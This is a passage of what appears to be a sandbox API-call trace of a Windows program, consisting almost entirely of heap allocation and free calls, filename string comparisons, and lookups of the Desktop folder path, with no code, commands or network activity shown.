(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0099.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0099.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0099.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0099.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0099.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0099.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0099.698] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0099.698] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EkLB 1ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kLB 1ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LB 1ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B 1ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 1ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ywsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wsMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sMV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0099.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MV77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="77uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uH53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="53.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0099.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0099.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0099.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0099.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0099.700] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0099.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0099.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0099.701] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0099.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0099.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0099.701] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0099.701] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0099.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0099.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0099.702] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0099.702] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0099.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0099.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0099.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2c) returned 0x2aa61e8 [0099.703] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EkLB 1ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kLB 1ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LB 1ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B 1ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" 1ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ywsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wsMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sMV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MV77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="77uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.704] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uH53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0099.705] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="53.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0099.706] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0099.706] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa62c8 [0099.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa62c8 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a90 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0099.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0099.707] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0099.707] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0099.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0099.707] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0099.708] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0099.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0099.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0099.708] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0099.708] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0099.709] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0099.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0099.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0099.711] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75240 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0099.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0099.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0099.712] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0099.712] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6370 [0099.712] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0099.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0099.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90e8 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0099.713] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0099.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0099.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0099.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0099.715] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0099.715] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0099.715] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0099.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0099.716] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0099.716] RtlAllocateHeap (HeapHandle=0x2af0000, 